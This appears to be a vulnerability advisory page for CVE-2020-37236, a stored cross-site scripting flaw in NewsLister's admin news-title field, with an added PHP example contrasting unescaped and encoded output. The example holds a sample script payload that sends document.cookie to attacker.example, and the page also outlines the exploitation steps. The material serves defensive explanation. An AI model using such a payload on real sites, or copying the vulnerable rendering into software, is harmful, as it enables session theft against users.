VYPR
Medium severity (6.4) · NVD Advisory · Published May 16, 2026 · Updated May 18, 2026

CVE-2020-37236

Description

NewsLister contains an authenticated persistent cross-site scripting vulnerability that allows authenticated administrators to inject malicious scripts through the title parameter in the news addition interface. Attackers can inject JavaScript payloads via the title field in the admin panel that execute when news items are viewed by other users.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

NewsLister <=1.0 contains an authenticated persistent XSS via the title parameter, allowing admin-injected scripts to execute for viewers.

Vulnerability

NewsLister versions up to and including 1.0 contain an authenticated persistent cross-site scripting (XSS) vulnerability in the news addition interface. The title parameter in /admin/index.php?page=add is not properly sanitized, allowing administrators to inject arbitrary JavaScript [1][2].

Exploitation

An attacker must first hold valid administrator credentials (obtained, for example, through phishing, credential reuse, or brute force), or already be a malicious insider with admin rights. After logging into the admin panel, they open the news addition page and submit a JavaScript payload in the title field. The title is stored as submitted, so when any other user (including lower-privileged users and other administrators) views that news item, the injected script executes in their browser with that viewer's session [1].
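The vulnerability and exploitation paragraphs above describe a stored title reaching the page without encoding. The following PHP is an added example written for this page; it is not NewsLister's code, and the function names, the `$news` array standing in for the database row, and the sample title are all constructed here to model that flow beside the hardened form.

```php
<?php
// Added illustration, not NewsLister's source. Models a news title submitted
// through an admin "add" form, stored verbatim, and then rendered to viewers.
// $news stands in for the stored database row; all names are hypothetical.

declare(strict_types=1);

// Constructed sample of what an administrator could type into the title field.
const SAMPLE_TITLE = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>';

// Vulnerable pattern: the stored title is concatenated straight into HTML,
// so the viewer's browser parses any markup it contains as part of the page.
function render_news_item_vulnerable(array $news): string
{
    return '<h2>' . $news['title'] . '</h2>' . "\n"
         . '<div class="body">' . $news['body'] . '</div>';
}

// Hardened pattern: encode for the HTML context at the point of output.
// ENT_QUOTES also covers attribute contexts, ENT_SUBSTITUTE keeps malformed
// UTF-8 from collapsing the output to an empty string, and pinning the
// charset prevents multibyte encoding tricks from defeating the escaping.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function render_news_item_safe(array $news): string
{
    return '<h2>' . h($news['title']) . '</h2>' . "\n"
         . '<div class="body">' . h($news['body']) . '</div>';
}

// Input validation on the add form: a length cap and rejection of control
// characters. It keeps junk out of the database but is NOT the XSS fix;
// the sample title passes this check unchanged, which is exactly why the
// encoding has to happen on output.
function validate_title(string $title): bool
{
    return mb_strlen($title, 'UTF-8') <= 200
        && preg_match('/[\x00-\x08\x0B\x0C\x0E-\x1F]/', $title) === 0;
}

$news = ['title' => SAMPLE_TITLE, 'body' => 'Constructed body text.'];

echo 'validate_title() accepts the sample title: ', var_export(validate_title($news['title']), true), "\n\n";
echo "Vulnerable render (script tag survives):\n", render_news_item_vulnerable($news), "\n\n";
echo "Hardened render (angle brackets become entities):\n", render_news_item_safe($news), "\n";
```

Run it with `php render.php`. The vulnerable output contains a live `<script>` element; the hardened output shows `&lt;script&gt;`, which the browser displays as text. If the title is ever placed inside a JavaScript block or a URL attribute rather than element text, the HTML encoder above is the wrong tool and a context-specific encoder is needed.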

Impact

Successful exploitation allows the attacker to execute arbitrary JavaScript in the context of the victim's browser. This can lead to session cookie theft, defacement, or redirection to malicious sites. The attack is persistent, meaning the payload remains active for all subsequent viewers until the malicious news item is removed [2].

Mitigation

No official patch or updated version has been released by the vendor. Until one exists, restrict admin panel access to trusted users (and protect those accounts with strong credentials and, where possible, network-level restrictions), and consider a web application firewall (WAF) to filter common XSS payloads. A WAF only matches known payload shapes and can be bypassed, so it is a stopgap; the durable fix is contextual output encoding of the title wherever it is rendered, which requires a change to the application's code. If that is not feasible, disable the news addition functionality or remove the application entirely [1][2].

AI Insight generated on May 21, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Patches: 0

No patches discovered yet.

Vulnerability mechanics

AI mechanics synthesis has not run for this CVE yet.

References: 3

News mentions: 0

No linked articles in our index yet.